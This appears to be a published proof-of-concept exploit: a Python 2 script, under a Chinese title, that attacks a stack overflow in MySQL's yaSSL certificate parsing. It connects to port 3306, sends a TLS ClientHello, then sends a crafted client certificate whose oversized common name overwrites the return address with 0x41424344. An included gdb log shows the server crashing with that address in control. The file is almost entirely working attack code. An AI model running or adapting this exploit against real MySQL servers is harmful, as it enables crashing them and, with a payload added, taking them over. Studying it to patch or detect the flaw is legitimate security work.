MySQL yaSSL库证书解析栈溢出漏洞

#!/usr/bin/env python # # Use this code at your own risk. Never run it against a production system. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. """ Usage: mysql_overflo1.py localhost MySQL yassl cert parsing stack overflow Debug session on 5.5.0-m2 suse11:~ # gdb -q (gdb) att 5542 Attaching to process 5542 Reading symbols from /var/mysql/libexec/mysqld...cdone. ... 0xffffe430 in __kernel_vsyscall () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0xb6bbab90 (LWP 5545)] 0x41424344 in ?? () (gdb) """ import os import getopt import sys import socket import time import telnetlib import struct import base64 import random class theexploit: def __init__(self,host): self.host = host self.port = 3306 def gettcpsock(self): sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) return sock def int2berlen(self,i): e=self.int2ber(i, signed=0) if i <= 127: return e else: l=len(e) return chr(0x80|l) + e def int2ber(self,i, signed=1): encoded='' while ((signed and (i>127 or i<-128)) or (not signed and (i>255))): encoded=chr(i%256)+encoded i=i>>8 encoded=chr(i%256)+encoded return encoded def big_endian_24(self, length): l1 = (length & 0xff0000) >> 16; l2 = (length & 0xff00) >> 8; l3 = length & 0xff; size = chr(l1) + chr(l2) + chr(l3) return size def attack_mysql(self): sock = self.gettcpsock() sock.connect((self.host, self.port)) #sock.set_timeout(30.0) print "press any key" sys.stdin.readline() s=sock.recv(8000) print s s ="\x20\x00\x00\x01\x85\xae\x03\x00\x00\x00\x00\x01\x08\x00\x00\x00" s+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" s+="\x00\x00\x00\x00" s+="\x16\x03\x01\x00\x60\x01\x00\x00\x5c\x03\x01\x4a\x92\xce\xd1\xe1" s+="\xab\x48\x51\xc8\x49\xa3\x5e\x97\x1a\xea\xc2\x99\x82\x33\x42\xd5" s+="\x14\xbc\x05\x64\xdc\xb5\x48\xbd\x4c\x11\x55\x00\x00\x34\x00\x39" s+="\x00\x38\x00\x35\x00\x16\x00\x13\x00\x0a\x00\x33\x00\x32\x00\x2f" s+="\x00\x66\x00\x05\x00\x04\x00\x63\x00\x62\x00\x61\x00\x15\x00\x12" s+="\x00\x09\x00\x65\x00\x64\x00\x60\x00\x14\x00\x11\x00\x08\x00\x06" s+="\x00\x03\x02\x01\x00" sock.sendall(s) print "Sent SSL_CLIENT_HELLO" sock.sendall(self.make_overflow()) print "Sent SSL_CLIENT_CERTIFICATE" sock.close() def run(self): self.attack_mysql() return 0 def make_overflow(self): retaddr=0x41424344 cn="" cn += "\x00"* 1062 cn+=struct.pack ("<L",retaddr)*6 #cn += "\x40" * 100 #cn += "\xcc"*100 #cn += "\x40" * 100 cert = "\x2a\x86\x00\x84" + struct.pack(">L",len(cn)) + cn cert = "\x30\x82\x01\x01\x31\x82\x01\x01\x30\x82\x01\x01\x06\x82\x00\x02" + cert cert ="\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00" + cert cert = "\x30" + self.int2berlen(len(cert)) + cert cert = "\x30" + self.int2berlen(len(cert)) + cert cert1 = self.big_endian_24(len(cert)) + cert certs = self.big_endian_24(len(cert1)) + cert1 handshake = "\x0b" + self.big_endian_24(len(certs)) + certs msg = "\x16\x03\x01" + struct.pack(">H",len(handshake)) + handshake return msg if __name__=="__main__": app = theexploit(sys.argv[1]) app.run()